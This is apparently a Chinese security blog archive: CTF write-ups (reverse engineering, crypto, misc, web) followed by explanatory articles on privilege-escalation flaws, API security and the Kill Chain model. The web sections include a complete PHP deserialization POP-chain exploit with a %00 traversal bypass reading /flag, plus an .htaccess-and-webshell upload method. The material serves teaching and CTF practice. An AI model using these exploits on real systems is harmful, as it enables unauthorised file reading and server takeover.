其模式如图所示，通过xor + jz形式，看似为条件判断的jz，由于xor rax, rax必得0，故jz的跳转必定执行，而ida无法发现这一点。我们可以通过将jz指令改为直接跳转的jmp指令，从而避免ida误判。

阶段二

patch掉阶段一的花指令后，发现程序中存在大量int 3调试中断指令，又有位于0x140001320的调试中断事件处理函数，如下图所示：

该函数会根据int 3指令后一字节的值采取不同的处理方式，本质上是模拟一条指令的运行，如图中的case 4，等价于mov rcx, rsi。因此我们对所有int 3指令进行patch，转换为其等价的汇编指令。

阶段一和阶段二的patch脚本如下：

from keystone import *
ks = Ks(KS_ARCH_X86,KS_MODE_64)
def patch1(start, end):    size = end - start    start -= 0xc00    end -= 0xc00    tmp = bytearray(raw)    for i in range(start, end):        if tmp[i:i+5] == b'\x50\x48\x31\xc0\x74':            tmp[i+4] = 0xeb            jmp_size = tmp[i+5]            tmp[i+6:i+6+jmp_size] = b'\x90'*jmp_size    with open('junk-new1.exe','wb') as f:        f.write(tmp)
def patch2(start, end):    size = end - start    start -= 0xc00    end -= 0xc00    tmp = bytearray(raw)    for i in range(start, end):        if i in (0x41e, 0x41f, 0xcd2):            continue        if 0x572 <= i < 0x580 or 0x71d <= i < 0x720 or 0xd4c <= i < 0xd50 or 0xe45 <= i < 0xe50 or 0xe9b <= i < 0xea0:            continue        if tmp[i] != 0xcc:            continue        choice = tmp[i+1]        if choice == 1:            ins_len = 4            delta = tmp[i+3]            sign = tmp[i+2]            if sign == 3:                ins = f'sub rsp, {delta:#x}'            elif sign == 2:                ins = f'add rsp, {delta:#x}'            else:                print('Sign error!')                assert 0        elif choice == 4:            ins = 'mov rcx, rsi'            ins_len = 3        elif choice == 5:            ins = 'cmp rax, 0x2a'            ins_len = 4        elif choice == 6:            ins = 'mov rdx, rsi'            ins_len = 3        elif choice == 8:            ins = 'mov edx, 0x9E3779B9'            ins_len = 5        elif choice == 9:            ins = 'mov r11d, 32'            ins_len = 6        elif choice == 10:            ins = 'mov eax, esi'            ins_len = 2        elif choice == 11:            ins = 'mov ebx, eax'            ins_len = 2        elif choice == 12:            ins = 'xor ebx, esi'            ins_len = 2        elif choice == 13:            ins = 'add ebx, 45'            ins_len = 3        elif choice == 14:            ins = 'xor ebx, edi'            ins_len = 2        elif choice == 15:            ins = 'add ecx, ebx'            ins_len = 2        elif choice == 16:            ins = 'mov esi, ecx'            ins_len = 2        elif choice == 17:            ins = 'add esi, 67'            ins_len = 3        elif choice == 18:            ins = 'xor edi, esi'            ins_len = 2        elif choice == 19:            ins = 'add esi, 86'            ins_len = 3        elif choice == 20:            ins = 'xor esi, edi'            ins_len = 2        elif choice == 29:            ins = 'call 0x140001950; push rax'            tmp[i:i+6] = ks.asm(ins, 0x1400010B8)[0]        elif choice == 30:            tmp[i:i+2] = ks.asm('jmp 0x140001106', 0x1400010F0)[0]            tmp[0x506:0x506+7] = ks.asm('call 0x140001a50;jmp 0x1400010F2', 0x140001106)[0]        else:            print(f'{i+0x140000c00:#x}: unknown {choice}')            assert 0
        if choice not in (29, 30):            tmp[i:i+ins_len] = ks.asm(ins)[0]
    with open('junk-new2.exe','wb') as f:        f.write(tmp)

with open('./junk.exe', 'rb') as f:    raw = f.read()patch1(0x1000, 0x1aa0)
with open('./junk-new1.exe', 'rb') as f:    raw = f.read()patch2(0x1000, 0x1aa0)

阶段三

patch后得到程序核心逻辑如下：

其中enc1函数为TEA加密

enc2函数为逐字节循环左移5位

解密脚本如下：

from struct import pack, unpackfrom ctypes import *
ans = [  0xF2, 0x7F, 0x09, 0x05, 0xD7, 0x77, 0x16, 0x91, 0x25, 0x01,   0x2E, 0xC5, 0x97, 0x26, 0x63, 0x82, 0x01, 0x40, 0x15, 0x2D,   0xFC, 0x53, 0xDB, 0xD3, 0xC4, 0xDB, 0x0A, 0x1F, 0x82, 0x1E,   0x99, 0x4E, 0xFE, 0x0C, 0x80, 0xB8, 0xA5, 0x61, 0x0E, 0x99,   0xDF, 0x39]
def dec1(data):    for i in range(len(data)):        data[i] = (data[i] >> 5) | ((data[i] << 3) & 0xff)
def dec2(data):    for i in range(len(data)):        data[i] ^= 0x66        data[i] -= 50        data[i] &= 0xff
def dec3(data):    data = bytearray(data)    k = [12, 45, 67, 86]    for i in range(0, 40, 8):        v0, v1 = unpack('II', data[i:i+8])        v0 = c_uint32(v0)        v1 = c_uint32(v1)        delta = 0x9E3779B9        total = c_uint32(delta*32)        for j in range(32):            v1.value -= ((v0.value << 4) + k[2]) ^ (v0.value + total.value) ^ ((v0.value >> 5) + k[3])            v0.value -= ((v1.value << 4) + k[0]) ^ (v1.value + total.value) ^ ((v1.value >> 5) + k[1])            total.value -= delta        data[i:i+8] = pack('II', v0.value, v1.value)    return data
if __name__ == '__main__':    data = ans    dec1(data)    dec2(data)    flag = dec3(data)    print(flag)

运行即可得到flag

0x1 签到题

0x2 simple math

脚本如下：

from Crypto.Util.number import *import hashlibfrom gmpy2 import *c1 =  85139434329272123519094184286276070319638471046264384499440682030525456122476228324462769126167628121006213531153927884870307999106015430909361792093581895091445829379547633304737916675926004298753674268141399550405934376072486086468186907326396270307581239055199288888816051281495009808259009684332333344687c2 =  104554808380721645840032269336579549039995977113982697194651690041676187039363703190743891658905715473980017457465221488358016284891528960913854895940235089108270134689312161783470000803482494370322574472422461483052403826282470850666418693908817591349159407595131136843764544166774390400827241213500917391144c3 =  94771625845449128812081345291218973301979152577131568497740476123729158619324753128517222692750900524689049078606978317742545997482763600884362992468406577524708622046033409713416026145377740182233674890063333534646927601262333672233695863286637817471270314093720827409474178917969326556939942622112511819330x =  78237329408351955465927092805995076909826011029371783256454322166600398149132623484679723362562600068961760410039241554232588011577854168402399895992331761353772415982560522912511879304977362225597552446397868843275129027248765252784503841114291392822052506837132093960290237335686354012448414804030938873765y =  100442166633632319633494450595418167608036668647704883492068692098914206322465717138894302011092841820156560129280901426898815274744523998613724326647935591857728931946261379997352809249780159136988674034759483947949779535134522005905257436546335376141008113285692888482442131971935583298243412131571769294029z =  104712661985900115750011628727270934552698948001634201257337487373976943443738367683435788889160488319624447315127992641805597631347763038111352925925686965948545739394656951753648392926627442105629724634607023721715249914976189181389720790879720452348480924301370569461741945968322303130995996793764440204452
e=2022tmp1 = pow(x-e,e)-c1tmp2 = pow(y-e,e)-c2m = gcd(tmp1,tmp2)print(m)tmp3 = (x-e) % mfor i in range(1000):    m1 = tmp3 + i*m    if c1 == pow(m+m1,e,m*m1):        print (m1)        break
tmp4 = (y-e) % mfor i in range(1000):    m2=tmp4+i*m    if c2 == pow(m+m2,e,m*m2):        print(m2)        breakflag = m + m1 + m2flag = hashlib.md5(str(flag).encode('utf-8')).hexdigest()print(flag)

0x3 easywork

根据https://blog.csdn.net/superprintf/article/details/108964563博客中的方法中求解a、b、n。

from math import gcdfrom gmpy2 import invert
x = [150532854791355748039117763516755705063,335246949167877025932432065299887980427,186623163520020374273300614035532913241,215621842477244010690624570814660992556,220694532805562822940506614120520015819,17868778653481346517880312348382129728,160572327041397126918110376968541265339]
t = [x[i+1] - x[i] for i in range(len(x)-1)]
def f(i):    return t[i]*t[i+2]-t[i+1]*t[i+1]
p = gcd(f(0), f(1))print('p=',p)a = invert(x[1]-x[0], p)a = a * (x[2]-x[1]) % pprint('a=',a)b = (x[1] - x[0] * a) % pprint('b=',b)#p= 339088189917874808463944743121467561531#a= 259086495324961642923203668736965982268#b= 121870392737324465817476070178603827899

p= 339088189917874808463944743121467561531a= 259086495324961642923203668736965982268b= 121870392737324465817476070178603827899c = 114514e= int(2e8)m = 10**10000
e1 = (a*c)/(b-c)e2 = p/(b-1)
def f(n):    t1 = RR(pow(b, n, m).lift())    t2 = RR(pow(c, n, m).lift())    return t1*(1+e1+e2)-e1*t2-e2
print(f(e))

最后将f(e)带入sol后算出md5，与加密结果异或得到flag

0x4 Web-923

有.git路径，所以有git泄露，拖源码

代码审计发现上传路径

上传后，由时间戳重命名

发现有后缀过滤

但htaccess过滤有问题，只过滤了.htaccess后缀的，所以可以上传.htaccess文件，且同时需要跟木马文件同一时间上传

成功解析

哥斯拉连上，读取flag

0x5 Misc-620

爆破密码得到密码99114514

发现password，7EqufFnrSGk=

base64解密得，EC4AAE7C59EB4869

尝试解MD5得，nmy0612

得到flag文件

爆破编码得flag，flag{d2112923-78d6-4064-977c-b73297dc4491}

0x6 misc034

文件名字tHXcode （后面才知道是汉信码）

Hxd打开文件发现有PNG的特征把它补全

打开来是二维码

扫描二维码转到油管视频翻了一下好像没有意义 https://www.youtube.com/watch?v=l3N9fPIT4yw

用stegsolve发现通道RGB 0 1通道有大概噪点

把噪点提取出来

import cv2import cv2 as cvimport numpy as npimport os
pic = cv2.imread("D:\\tmp\\tHXcode.png")c1,c2,c3 = pic.shape
blank_image = np.zeros((348,348,3), np.uint8)
for i in range(c1):    for j in range(c2):        for k in range(c3):            if pic[i,j,k] == 0 or pic[i,j,k] == 255:                blank_image[i,j,k] = 0            else:                blank_image[i, j, k] = 255cv2.imwrite('new.png',blank_image)cv2.imshow('canvas',blank_image)cv2.waitKey(0)cv2.destroyAllWindows()

跑出来这样

长得像二维码少了定位标志但又不太对发现是汉信码

找个画格子网站https://www.pixilart.com/draw?ref=home-page 画出来

读取得到flag flag{ae0f3bce-814b-4928-9801-7a2f2ca88273}

0x7 MISC830

伪加密，改09为00

得到图片

Stegsolve看一下，最后一个通道前面都是0和1

发现有108900个0或1

发现330*330=108900，尝试以1为黑，0为白，画图

import cv2import cv2 as cvimport numpy as np
f = open("123.txt",encoding = "utf-8")
blank_image = np.zeros((330,330,3), np.uint8)
a = f.read()
aa = 0
for i in a:    x = aa//330    y = aa%330    if i == '0':        blank_image[x, y, 1] = 0    else:        blank_image[x, y, 0] = 255        blank_image[x, y, 1] = 255        blank_image[x, y, 2] = 255    aa += 1cv2.imwrite('new.png',blank_image)cv2.imshow('canvas',blank_image)cv2.waitKey(0)cv2.destroyAllWindows()

像是拼接的二维码，拼接一下

扫码得flag

0x8 WEB925

反序列化要触发readfile函数读取flag，要找能够执行函数调用Onemore类的readfile方法，在suhasuha类的__set方法中($this->action)()存在函数调用点，因此要想办法触发__set魔术方法。在abaaba类中_get方法里存在$this->DoNotGet->$name = "two"的set链，因此需要将$this->DoNotGet设为suhashuha类，这样触发__get方法后尝试给suhasuha中的name参数赋值，触发suhasuha类中的__set方法。

接下来的问题是，如何触发abaaba类的__get魔术方法，在abaaba类中本身存在的__toString魔术方法中存在get操作，可以触发__get魔术方法，接着考虑如何触发abaaba类的__toString魔术方法，往下看在One类中的__destruct方法中可以将$count参数当字符串使用，此处将abaaba类实例传入$count参数即可触发__toString魔术方法，综上，正向调用链为首先初始化一个abaaba类将suhasuha类赋给DoNotGet参数，再利用One->__toString->abaaba->__toString->abaaba->__get->suhasuha->__set->Onemore->readfile。

safe过滤函数过滤了/../../和其转义变形，用%00绕过即可。

class abaaba{    protected $DoNotGet;
    public function __construct($s){        echo '1';        $this->DoNotGet = $s;    }
    public function __get($name){        echo '2';        $this->DoNotGet->$name = "two";        return $this->DoNotGet->$name;    }
    public function __toString(){        echo '3';        return $this->Giveme;    }}
class Onemore{
    public $file;

    public function readfile($f){        echo '4';        $this->file = isset($f) ? $f : 'image'.$this->file;        echo file_get_contents(safe($this->file));    }
    public function __invoke(){        echo '5';        return $this->filename->Giveme;    }}
class suhasuha{    public $action;
    public function __set($name, $value){        echo '6';        $this->Giveme = ($this->action)();        return $this->Giveme;    }}
class One{    public $count;
    public function __construct(){        echo '7';        $this->count = "one";    }
    public function __destruct(){        echo '8';        echo "try ".$this->count." again";    }
}
function safe($path){    $path = preg_replace("/.*\/\/.*/", "", $path);    $path = preg_replace("/\..\..*/", "!", $path);    $path = htmlentities($path);    return strip_tags($path);}
$a = new One();$b = new suhasuha();$c = new Onemore();$d = new abaaba($b);
$a->count = $d;$b->action = [$c,"readfile"];$c->file = urldecode("/..%00/..%00/..%00/..%00/..%00/..%00/..%00/..%00/..%00/..%00/..%00/..%00/flag");echo urlencode(serialize($a));
?>

阅读原文

跳转微信打开

越权漏洞简介

Thu, 28 Apr 2022 18:13:00 +0800

fanbaowen 2022-04-28 18:13 浙江

一、越权漏洞简述

越权漏洞指应用在检查授权时存在纰漏，使得攻击者在获得低权限用户账户后，利用一些方式绕过权限检查，访问或者操作其他用户或者更高权限。例如在图1.1中购物系统中A用户可以查询到B用户的订单信息，是为水平越权；普通用户获取管理员权限的功能，是为垂直越权。

图1.1 越权示意图

常见越权漏洞的利用方式有基于用户身份ID、基于对象ID、基于会话、未授权访问等。基于ID的方式通常替换SESSION或URL中的ID，查看别人的信息（如图1.2所示）；基于会话的方式为盗用他人的SESSION或COOKIE信息，从而顶替他人进行操作（如图1.3所示）。

图1.2 参数替换示意图

图1.3 SESSION替换示意图

无论是什么字段，存在越权数据操作漏洞的web应用都没有对它们的归属账户进行判断，没有确认发起请求的账户是否具有操作的缺陷就直接执行了相应的命令。

为了进一步搞清楚越权漏洞的原理，下面以pikachu靶场为例介绍漏洞形成的原因及简要加固措施。

水平越权

在登录Lucy账号的情况下，将url中的地址修改为lili就可以看到lili的个人信息，触发水平越权漏洞。

图1.4 水平越权示意图

分析源码可以看到，在登录时后台将用户名和密码保存在session中，但读取用户信息时没有使用session进行校验。加固方法也很简单，添加一层if判断session中的用户名与当前用户名是否一致即可。

图1.5 水平越权源码分析——保存session

图1.6 水平越权源码分析——身份校验缺失

垂直越权

登录管理员账号可以看到，管理员有添加用户的权限，而普通账户则没有。

图1.7 管理员登录界面

图1.8 普通用户登录界面

首先登录管理员账户，在添加用户的界面填写信息、点击创建后抓包，发送到重放器（图1.9）。此时点击发包，查看用户列表新用户fanfan并未创建成功（图1.10）。

图1.9 创建用户抓包

图1.10 此时未创建新用户

退出管理员用户，登录普通用户（图1.11）。抓包获取cookie后替换重放器中的cookie，首先完成普通用户的登录（放包），然后在重放器中点击发送（图1.12），此时查看用户列表可以看到新用户添加成功（以普通用户的身份添加，图1.13），触发垂直越权漏洞。

图1.11 普通用户登录抓包

图1.12 cookie替换，发生越权

图1.13 普通用户新建用户成功

分析源码可以发现在登录时会校验用户的权限，不同权限进入不同的页面。但在新建用户插入数据库时，没有校验权限，导致漏洞出现。防御措施很简单，在插入数据库前校验用户的level。

图1.14 垂直越权源码分析——登录权限校验

图1.15 垂直越权源码分析——权限校验缺失

二、漏洞检测

目前越权漏洞的检测更多依赖人工进行，自动化方法是未来的发展方向。

（一）人工检测

对于水平越权漏洞，暴力遍历是一种很好的渗透测试方法。该方法利用burp suite遍历一组ID，进行批量检测，如图2.1所示。

图2.1 使用burpsuite进行遍历

另一种更为常见的方式是流量重放，流程图如图2.2所示。该方法首先登录高权限账户A并发起一次数据操作的请求，使用抓包工具拦截该请求数据包并复制SESSION，此时登录低权限用户B，替换SESSION后重放，低权限用户B实现了越权操作。在金融领域中，可对UKEY进行校验后的新增操作进行抓包，替换SESSION后重放，可以实现无需UKEY校验的任意次操作。

图2.2 流量重放步骤图

（二）自动化检测

自动化检测方法相比手动，是在流量获取环节提升了自动化的程度。图2.3所示为自动化越权漏洞检测方法架构图。

图2.3 自动化方法架构图

方法分为系统认证、流量获取和越权判断三个步骤：

系统认证即登录环节。
流量获取是提升自动化程度的重要阶段，动态爬取方法使用无界面浏览器爬虫对站点进行动态的爬取；在有流量网关的情况下，可以直接从流量网关抓取流量，从流量网关中筛选出目标的请求即可；或通过在测试人员的浏览器中安装插件并配置好测试系统相关信息后，在测试人员手动点击待测功能，就可以通过插件或代理服务器等方式收集到待测流量。
在流量对比阶段，对于垂直越权，只需要再对不同身份下的请求做个减法便可以得到不属于该身份的请求。但是对于一些公共接口还是需要通过手动判断或者通过关键字白名单的方式进行过滤。对于水平越权，一些简单的站点可以根据表单中的禁止编辑属性以及返回信息等属性来得到判断依据，更为复杂的仍需人工判断。一种批量对比的方法是统一修改认证信息，通过对比重放前后的返回信息内容进行判断是否存在越权。

使用爬虫方法的流程图如图2.4所示。可以看出在验证部分仍需要手动替换信息、重放流量包。自动化检测是未来研究的热门方向。

图2.4 使用爬虫的自动化方法流程图

三、防守策略

（一）安全管控左移

针对业务类逻辑漏洞，我们可以充分发挥甲方的优势，采用威胁建模的方法，在项目进入设计阶段前就建立起漏洞的预防链，如图3.1所示。例如在某个系统中的“查询、展示”场景中，就要考虑接口对应的代码、接口对应的业务、接口返回的数据、接口的数据来源等等中可能存在的安全风险。一次完整的威胁建模可以将服务、应用，甚至依赖包等都纳入风险分析的范围内。

图3.1 威胁建模方法的应用

（二）开发者应注意的地方

开发人员在权限管理中遵守下列规则，可减少越权漏洞的发生：

使用最小权限原则对用户进行赋权；
使用合理（严格）的权限校验规则；
使用后台登录态作为条件进行权限判断。

四、参考文献

[1]净山, 徐国爱. 一种Web应用越权漏洞自动化检测实现[J]. 2014.

[2]赵川, 徐雁飞. 一种越权漏洞攻击方法实例研究[J]. 信息安全研究, 2019, 5(3):5.

阅读原文

跳转微信打开

API安全浅析

Tue, 08 Mar 2022 09:22:00 +0800

RedGlare 2022-03-08 09:22

一、什么是API

API通过定义一组函数、协议、数据结构，明确应用程序中各个组件之间通信与数据交互方式。将Web应用、操作系统、数据库以及计算机软硬件的能力以接口的形式提供给外部使用。

API技术解决的是程序之间的连接问题。
API提供能力，调用方不用访问源码或理解程序内部工作机制。

二、API安全形势

1、API发展趋势

目前随着互联网、物联网等快速发展，越来越多的开发者会使用API接口为客户提供各种微服务并通过云原生应用快速部署容器进行快速迭代开发。因此无论是在互联网访问网络资源或者通过物联网进行系统应用的控制都会利用API接口。

为了让客户获得更好的服务体验，银行机构正在采用、甚至迁移到API式的敏捷模型中，以实现高效、强适应性的金融安全架构。

医疗保健行业的从业人员通过各种可用的API，向患者和客户提供集成化的医疗保健服务，并能提高自身产品的互操作性。

零售商正在使用API为其客户提供更加智能化的电子商务平台，例如：多元化的移动支付应用等。

2、API安全面临的挑战

据统计，API请求已占所有应用请求的83%，预计2024年API请求命中数将达到42万亿次。与此同时，针对API的攻击成为了恶意攻击者的首选，相对于传统WEB窗体，API的性能更高、攻击的成本更低，有专家预测，到2024年API滥用将使得针对API的攻击成为最常见的攻击方式。之所以API安全问题如此严重，主要是因为API安全面临着如下挑战：

（1）应用和逻辑迁移上云，暴露更多攻击面

随着云计算技术的广泛应用，越来越多的Saas被迁移上云，在为更多的用户提供服务的同时，也将API暴露到云中，相对于传统数据中心的单点调用，东西向和南北向都可能成为API的攻击面。

（2）创新强调速度和灵活，忽略构建API安全

敏捷开发模式是当今主流开发模式，敏捷开发强调个体和互动、工作的软件、客户合作、响应变化，虽然提升了创新速度和灵活性，但是对于如何构建API安全性却缺少合适的方法，导致在软件构建过程中难以顾及API安全。

（3）API接口对外不可见，引发多种攻击隐患

由于API是由程序员书写，除了编写代码的程序员，很少有人意识到这些API的存在，缺少维护的API经常容易被忽略，然而恶意攻击者却可以利用网络流量、逆向代码、安全漏洞等各种手段找到不设防API并实施攻击。

（4）组织经常低估API风险，造成安全措施遗漏

人们通常会假设程序会按照想象中的过程运行，从而导致API被攻击的可能性以及影响被严重低估，因此不去采取充分的防护措施。此外，第三方合作伙伴系统的API，也容易被组织所忽视。

3、API安全面临的威胁

据权威报告显示，以API为目标的攻击是以HTML应用为目标攻击的三倍，部分攻击造成了严重的业务中断，攻击者利用弱身份认证、授权和注入漏洞实施攻击的方法仍然普遍，而利用Json、XML等基于解析器的攻击以及第三方API集成带来的风险正在增加，经综合分析，API的攻击类型包括：

（1）凭证类攻击

据统计，2018-2020期间，有1000亿次的凭证盗用攻击,而且每年攻击的复杂度和数量都在持续增加，凭证盗用攻击的代价高达2280万美元，平均每30秒就有一位凭证盗用的受害者。攻击者通过购买、钓鱼、漏洞利用等方式获得API登录凭证，继而利用僵尸网络接入客户站点API，盗取客户数据或者个人信息。

（2）可用性攻击

当API端点对外暴露，攻击者就可以利用DDOS或者攻击API解析器，造成API无法提供相应服务。对于DDOS，除了部署常规防DDOS设备以外，还要关注合作伙伴API的DDOS攻击承受能力，如果仅仅依靠合作伙伴的安全措施，原始API就得不到保护。而针对API解析器的攻击则更具有针对性，可能造成哈希值冲突或者反序列化异常，进而拒绝API请求。

（3）漏洞利用攻击

漏洞利用是所有应用程序面临的安全威胁，API也不能例外。通过在API的函数参数、Json、XML等有效负载嵌入恶意代码，实施目录转换、命令注入、SQL注入、XSS、绕过身份认证和授权等常见的API攻击手段，达到敏感数据窃取或破坏系统的目的。更进一步，API攻击已经工具化，攻击者能够利用工具搜集用于攻击的域名和API列表，再使用其他工具查找或删除敏感数据。

4、API相关的常见数据安全问题

（1）数据滥用风险

例如第三方超出业务需要，私自大量缓存、调用接口数据；接口返回超出最小必要原则的敏感个人信息字段；高敏感级别字段（例如《个人金融信息保护技术规范》定义的C3级别个人金融信息）未按规定脱敏或脱敏策略不一致。

（2）数据泄露风险

例如数据接口权限漏洞被外部攻击者利用窃取敏感数据；或者内部员工利用遗留后门接口获取敏感数据。

（3）隐私合规风险

例如隐私数据采集未经用户授权；隐私数据接口违规开放给第三方等。

API安全一旦出现问题，可能导致的是百万、千万、甚至亿级的个人信息泄露，使企业面临违反《网络安全法》第四十二条“网络运营者应当采取技术措施和其他必要措施，确保其收集的个人信息安全，防止信息泄露、毁损、丢失”的合规风险。由此可以看出，API安全应当作为一项重要抓手，用于管控组织级别的数据安全与个人信息安全风险。

三、OWASP API Top 10

A1：失效的对象级授权

预防措施：

（1）基于用户策略和继承关系来实现适当的授权机制

（2）使用随机且不易推测的IDs (UUIDs)

A2：失效的用户身份认证

预防措施：

（1）凭据重置、忘记密码端应被视作认证端点，在暴力破解、请求频率限制和锁定保护上同等对待

（2）使用标准认证、令牌生成、密码存储、多因素认证

A3：过度的数据暴露

预防措施：

（1）不要依赖客户端来过滤敏感数据

（2）检查API的响应，确认其中仅包含合法数据

A4：资源缺失&速率限制

预防措施：

（1）对用户调用API的频率执行明确的时间窗口限制

（2）在突破限制时通知客户，并提供限制数量及限制重置的时间

A5：失效的功能级别授权

预防措施：

（1）强制执行机制应拒绝所有访问，要求显式授予特定角色才能访问每个功能

（2）确保常规控制器内的管理功能根据用户的组和角色实施授权检查

A6：批量分配

预防措施：

（1）不要自动绑定输入数据和内置对象

（2）在设计时准确定义您将在请求中接受的模式、类型和模型，并在运行时强制执行

A7：安全配置错误

预防措施：

（1）防止异常追踪和其他有价值的信息被传回攻击者，定义和强制使用统一的API响应格式，包括错误信息

（2）在所有环境中持续评估配置和设置有效性的自动化过程

A8：注入

预防措施：

（1）将数据与命令和查询分开

（2）严格定义所有输入数据:模式、类型、字符串模式，并在运行时强制执行

A9：资产管理不当

预防措施：

（1）对集成服务进行清点并记录重要信息，如它们在系统中的角色、交换了什么数据(数据流)及其敏感性

（2）采用开放标准自动生成文档，包括在CI/CD管道中构建的文档

A10：日志和监控不足

预防措施：

（1）所有失败的安全策略，如日志中失败登录尝试，拒绝访问，输入验证失败，都要接受检查

（2）配置一个监控系统，以持续监视基础设施、网络和API功能

四、API安全治理

1、API风险调查

溯源定位

通过将告警的源地址与资产数据进行匹配，以及提取APIurl中的账号等参数信息，来识别出告警主体的更多信息。如果是来自内部的操作，则可以直接定位到当事的操作员工，以及所在团队或者营业部。

告警聚集性挖掘

通常来说，我们需要特别关注聚集性的告警。在溯源定位完成之后，我们利用聚类分析，将告警从多个维度进行聚类，挖掘告警的聚集性和作案的团伙性。如是否存在营业部聚集、是否存在地理位置聚集、是否存在对某一类数据的聚集等，并将其呈现在面板上。

情报印证

API告警的背后，是疑似API被滥用和数据被泄露。我们将告警中涉及的数据与外部泄露情报进行自动比对，如果比对印证成功，则API被滥用和数据被泄露的实锤加大，同时也省去了大量人工调查环节的证据搜索时间。

行为链路梳理

一个真实的风险事件，可能会伴随着一系列的异常行为。如通过频繁调用API接口获取了大量个人隐私数据，后续可能会出现数据外发的DLP事件，或者之前已申请离职，意图将敏感数据带走等。因此对于一条告警，我们会搜索告警时点前后的重要行为，并将其展现到调查面板中。

2、API管理

首先，对全部API进行全面文档化管理，为了规避API变动频繁的困难，推荐使用开源自动化管理工具，在API变更时添加描述性说明，自动生成最新API文档，同时自动检查流量以发现和分析未知或更改的API，以便快速响应基于API的攻击。

其次，梳理API之间的调用链，梳理API之间的调用关系，找出僵尸API，防止安全防护措施遗漏，该步骤也可通过工具完成。

最后，对API实施契约测试和白盒测试，减少漏洞存在的可能性。

3、API安全防护措施

使用令牌技术

通过令牌建立API接口的可信身份，然后使用属于可信身份的令牌才能够实现对服务和数据资源等进行访问以及控制。

使用加密和签名技术

例如使用TLS等加密方式对数据进行加密，保证数据在传输过程中被加密并防止被篡改。使用签名技术可以保证只有拥有数据访问权限的用户才能够对数据进行解密并对数据进行修改。

主动识别API中的漏洞

可以使用检测嗅探器对API安全进行检测并检查数据被泄漏的情况，确保在网络环境下API服务的安全性，实时追踪API接口是否被非法黑客进行攻击以及漏洞被利用的情况。

使用API安全网关

目前API安全网关已经被作为防护API安全的一个关键技术被使用，由于API安全网关可以用来控制和管理API接口的使用情况，同时也可以对使用API接口和服务的用户进行身份认证，因此在保护数据和API安全性上具备一定优势。

对API接口的访问频率进行限制

由于业务的不同，API接口被调用的情况也会不同，通过分析和监测API接口被访问和调用的频率来确保API接口未被攻击者攻击以及数据被泄漏。一般来说被攻击的API接口往往会出现被调用次数增多或者频率与正常情况出现较大差异，因此通过限制API接口被访问的情况，进行限流等方式可以防护API出现被攻击者攻击甚至是拒绝服务的情况。

4、API安全检视

从发现、保护和分析三个维度，制定API安全检视列表，持续对API进行安全检视，以此发现隐患，制定策略、实施防护。在发现维度检视API开发、测试和部署的安全措施是否全面。在保护维度，检视用户标识、DDOS攻击防护措施、数据校验黑白名单是否完整。在分析维度，检视API风险评估、API审计日志是否充分。

5、展望

随着信息技术的快速发展，API安全防护也在持续演进过程中，最初API安全防护解决无效输入、DOS攻击、认证绕过等攻击，现今的防护重点则落地在缓冲区溢出、XSS、SQL注入等漏洞防护，安全防护的措施也从单个漏洞防护升级为网关、应用系统防护。未来，多向量、自动化工具、武器化人工智能类的攻击将成为API攻击的主流，相应的，安全防护措施也需加强系统化、自动化、深度学习、智能化能力，向以体系对抗体系，以智能防护智能的方向演进。

阅读原文

跳转微信打开

Kill Chain模型概述

Fri, 18 Feb 2022 15:55:00 +0800

瓦力 2022-02-18 15:55

一、背景

Kill Chain模型是洛克希德·马丁公司借用军事领域的“杀伤链”概念，结合对大量网络攻击、尤其是APT类攻击案例的分析成果，从攻击者的角度出发，以分段式任务模型描述网络入侵攻击的过程，具体描述了网络攻击从最早的侦察跟踪阶段，到最终的达成目标阶段，对网络攻击的各个阶段生命周期进行了系统性的阐述。

二、阶段介绍

杀伤链模型包括7个有序的步骤，具体为：侦察跟踪、武器构建、载荷投递、突防利用、安装植入、通信控制、达成目标。只有当攻击者完成了第7步工作，前面的6步才真正产生意义。

阶段一：侦察跟踪

在侦察阶段攻击者的工作是识别目标对象。侦察可以是静默状态的，也可以是是主动状态的。在此阶段，攻击者会选择攻击目标，并制定攻击计划，同时将尝试尽可能收集被攻击者的相关信息，侦察阶段的活动示例有：收集被攻击者的邮箱地址、查看与被攻击者相关的主页（例如：企业网站、社交网站等）、通过公开的媒体收集信息（例如：报纸、电视新闻等）。

阶段二：武器构建

在武器构建阶段攻击者将进行攻击前的准备工作，针对攻击目标的系统和防护措施，选择已有恶意软件和制作专用的恶意软件，现在很多的恶意软件已经可以通过自动化/半自动化的系统进行生产。由于系统的复杂性，在这一阶段，攻击者有可能与外部恶意软件生产者合作。需要注意的是，“后门”往往是武器化常用的手段。

阶段三：载荷投递

在载荷投递阶段，攻击者将完成把已经生产好的恶意软件投放到目标网络中。常用的攻击手法包括“钓鱼”、“水坑“等。武器化有效载荷最常见的传送媒介包括网站、可移动磁盘和电子邮件，这是安全团队可以阻止攻击的最重要阶段。

阶段四：突防利用

在突防利用阶段，攻击者通过网络的弱点以及被攻击者的安全意识不足问题，实现对被攻击者的访问，以获取敏感数据，例如密码文件，证书，甚至RSA令牌。如果攻击已进行到此阶段，则系统已遭到破坏，数据处于危险之中。

阶段五：安装植入

在安装植入阶段，攻击者将安装能够避过安全软件检查或杀灭的工具，这些工具可以用于获得被攻击者的访问权限和后续攻击活动，例如：在web服务器上安装webshell、部署后门工具、部署键盘/鼠标捕获工具等。这也是可以使用 HIPS（基于主机的入侵防御系统）等系统阻止攻击的另一个重要阶段。

阶段六：通信控制

在通信控制阶段，攻击者已经通过对被攻击者网络植入恶意软件获得了控制被攻击者网络的能力，开启通信通道，用于控制被攻击者的网络，通常这些控制手段是隐蔽的，隐藏于最常见的web、邮件、DNS协议中。攻击者为了隐藏自己的真实身份，通常会采用跳板的方式，即级联的受害者链进行远程控制。

阶段七：达成目标

在本阶段，既然攻击者已经控制了受害者的网络，那么接下来的工作就是完成其目标了，例如：破坏受害者的网络与信息、盗取业务信息、盗用受害者身份进行活动，以及提升权限进行更深度的破坏活动等。

三、防御策略

在网络杀伤链模型中，由于只有当攻击者完成了第7步工作，前面的6步才具有真正产生意义，并且攻击者往往只有完成了前6步的工作才能来到第7步，因此，在攻击者发起第1-6步时执行相应的行动对于网络攻击的防御具有重要意义。

1、侦察跟踪阶段

这一阶段，防护者可以通过主动检测尝试发现攻击者的“侦察“行为，侦察可以是静默状态的，也可以是是主动状态的，在攻击者采用静默状态时，被攻击者往往很难发现他们的对手，例如：攻击者收集被攻击者的邮箱地址；采用主动状态时，被攻击者可以从中发现攻击者的痕迹，例如：攻击者访问被攻击者的社交网络时可能会留下痕迹，从相应日志中可以获知攻击者的部分信息，如IP地址等。防护者可以采取以下行动：

收集各类设备、系统日志用于分析；
尽可能地收集网络流量信息，用于威胁分析；
采用UEBA的分析方法，发现潜在的威胁者；
